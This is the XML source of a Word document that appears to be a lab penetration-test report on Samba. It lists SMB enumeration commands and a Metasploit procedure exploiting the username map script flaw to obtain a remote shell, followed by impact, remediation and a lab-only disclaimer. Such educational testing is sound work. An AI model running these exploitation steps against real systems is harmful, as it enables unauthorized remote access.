        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DE6BE4" w14:textId="3407E817" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Commands: smbclient -L //&lt;victim ip&gt; -N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FB85DF" w14:textId="2D6139A0" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                           enum4linux &lt;victim ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF3418A" w14:textId="786150FC" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>These commands enumerate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F245F9C" w14:textId="514272AC" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shared Folders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CACEA09" w14:textId="48FA21AD" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56CBA4" w14:textId="64497803" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Groups</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED02AE2" w14:textId="3BBABF9D" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Operating system information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB4C5F7" w14:textId="6237F9A1" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>NetBIOS information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C909F7" w14:textId="4496BCE9" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="001841C2">
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DA047E" wp14:editId="16535C68">
            <wp:extent cx="6492121" cy="3009014"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1270"/>
            <wp:docPr id="58721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17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0022" cy="30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2199" w14:textId="77777777" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="001841C2">
      <w:r w:rsidRPr="001841C2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="324ABC4F" wp14:editId="2AB19CF0">
            <wp:extent cx="6357618" cy="5890437"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="206837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76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8060" cy="590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41C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D24DA8" w14:textId="1EAB5B35" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="001841C2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01E73BE6" wp14:editId="5F138093">
            <wp:extent cx="6209030" cy="5454502"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="101329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90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6232" cy="546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41C2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FC47935" wp14:editId="5BBD1661">
            <wp:extent cx="5908711" cy="2371060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89453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361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034" cy="238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A861" w14:textId="77777777" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="001841C2"/>
    <w:p w14:paraId="23175C3F" w14:textId="65AEEF7A" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C72330" w14:textId="203FA36D" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: Exploit the Samba Username Map Script vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313108B1" w14:textId="77777777" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A216919" w14:textId="5164E6AD" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Commands: msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0B963" w14:textId="1402795C" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                           search samba</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325EE99" w14:textId="18D98425" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
      <w:r w:rsidR="008F12A5" w:rsidRPr="008F12A5">
        <w:t>use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000931DC" w14:textId="7B225E32" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                           </w:t>
      </w:r>
      <w:r w:rsidRPr="008F12A5">
        <w:t>set RHOSTS &lt;Victim IP&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r w:rsidRPr="008F12A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008F12A5">
        <w:t>set LHOST &lt;Attacker IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A68D61" w14:textId="7035F2CF" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                           exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACB8E4" w14:textId="67BA959D" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Result: Remote shell successfully obtained</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A523B7F" w14:textId="3D624838" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                Command execution achieved on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09828634" w14:textId="0DF7A9BD" w:rsidR="00D44039" w:rsidRDefault="00D44039" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44039">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71377D31" wp14:editId="5BC786CE">
            <wp:extent cx="5943600" cy="4371340"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="162005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590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5084" w14:textId="6CCE47F3" w:rsidR="00D44039" w:rsidRDefault="00D44039" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44039">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="40AB3149" wp14:editId="3F7178C8">
            <wp:extent cx="5943600" cy="3471545"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98662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222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A034" w14:textId="6AACFBF9" w:rsidR="00D44039" w:rsidRDefault="00D44039" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00D44039">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="094B5ED8" wp14:editId="2B8240B6">
            <wp:extent cx="5372376" cy="711237"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="29890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055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4AE8" w14:textId="63251B59" w:rsidR="006A7642" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37FC1A" w14:textId="23DB0917" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: Verify successful access to the compromised system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D37D03B" w14:textId="77777777" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55F6233C" w14:textId="18CA4506" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Commands: whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F97D04C" w14:textId="165DA387" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="00D44039">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                          Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B7400" w14:textId="04C68033" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                          ls -la</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63A821" w14:textId="2B1E9C1B" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>These commands confirm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF4198B" w14:textId="3A6ADB2D" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Current user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A85A30" w14:textId="3DF92132" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="00D44039">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>User privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C156B79" w14:textId="6982631A" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>File system access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B85FCA7" w14:textId="73F5E2B4" w:rsidR="00D44039" w:rsidRDefault="00D44039" w:rsidP="00D44039">
      <w:r w:rsidRPr="00D44039">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B0703DC" wp14:editId="172BDB20">
            <wp:extent cx="4229317" cy="2654436"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="98153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353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8918" w14:textId="77777777" w:rsidR="00D44039" w:rsidRDefault="00D44039" w:rsidP="00D44039"/>
    <w:p w14:paraId="5105591A" w14:textId="51C67978" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4.Impact Assessment </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B91BC14" w14:textId="659EE061" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:r w:rsidRPr="008F12A5">
        <w:t>Samba Username Map Script flaw makes it possible for any unauthenticated hacker to run remote commands arbitrarily. Possible impacts include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B0115" w14:textId="107582FF" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F12A5">
        <w:t>Unauthorized remote system access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D88D0" w14:textId="222F9F8A" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F12A5">
        <w:t>Execution of arbitrary operating system commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34920B" w14:textId="32B7033B" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F12A5">
        <w:t>Compromise of confidential data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57380AD1" w14:textId="76E8E921" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F12A5">
        <w:t>Modifications and deletions of files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA0249F" w14:textId="37E68E85" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F12A5">
        <w:t>Further attacks on internal systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4367B0FE" w14:textId="6FAB0E8E" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5.Remediation and Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724C087A" w14:textId="3CEF91B8" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Immediate Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8B3A2B" w14:textId="4F965F0B" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Install an updated and supported version of Samba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A0F5E0" w14:textId="64ED3E58" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Turn off any unneeded SMB services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBCF36C" w14:textId="4D7F7633" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Constrain SMB connections through firewall configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A72284F" w14:textId="1A95B2C9" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Use SMB within trusted internal networks only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE336BD" w14:textId="61403DDC" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Long-term Security Measures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1329D" w14:textId="5CC2DACC" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Install regular security updates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6270E847" w14:textId="0D202A05" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Implement central logging and monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A357AD" w14:textId="25C8FA3F" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Conduct routine vulnerability assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1C87E" w14:textId="48AD6197" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:lastRenderedPageBreak/>
        <w:t>Install IDS/IPS (Intrusion Detection/Prevention Systems).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CFBA148" w14:textId="39D843FD" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Network segmentation is a requirement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A2453" w14:textId="52E38283" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00903663">
        <w:t>Follow the principle of least privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EF4CD2" w14:textId="1AA10119" w:rsidR="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Disclaimer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6930CFF6" w14:textId="467281EE" w:rsidR="00903663" w:rsidRPr="00903663" w:rsidRDefault="00903663" w:rsidP="00903663">
      <w:r>
        <w:t>This assessment was performed within a controlled laboratory environment for educational purposes . Unauthorized scanning or exploitation of systems without explicit permission is illegal and unethical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67117CC1" w14:textId="77777777" w:rsidR="008F12A5" w:rsidRDefault="008F12A5" w:rsidP="008F12A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680081F0" w14:textId="77777777" w:rsidR="006A7642" w:rsidRPr="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E81ECF7" w14:textId="77777777" w:rsidR="000F1435" w:rsidRPr="000F1435" w:rsidRDefault="000F1435" w:rsidP="000F1435">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000F1435" w:rsidRPr="000F14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6423"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1F43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158D5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B849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55638"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B8B8E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853951"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50C4C17E"/>
    <w:lvl w:ilvl="0" w:tplc="EDD8F72A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="Step%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos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4B4D4D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A00A52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B812DF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B17A4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22EEF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7674B3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9453E74"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4178E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373424">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1516117849">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="609507872">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="351734669">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="46876829">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="495148302">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1618676461">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1929919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7F9"/>
    <w:rsid w:val="000F1435"/>
    <w:rsid w:val="001841C2"/>
    <w:rsid w:val="006A7642"/>
    <w:rsid w:val="008A7E22"/>
    <w:rsid w:val="008F12A5"/>
    <w:rsid w:val="00903663"/>
    <w:rsid w:val="0095467B"/>
    <w:rsid w:val="00A777F9"/>
    <w:rsid w:val="00D4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9DF2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{070EDAC4-F91C-47D9-BD90-9A46B62BA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7F9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00A77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7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7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7F9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A777F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A777F9"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="PlainTable4">
    <w:name w:val="Plain Table 4"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="44"/>
    <w:rsid w:val="008A7E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12</Pages>
  <Words>653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 Bastola</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sudip Bastola</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-07-15T13:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-15T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>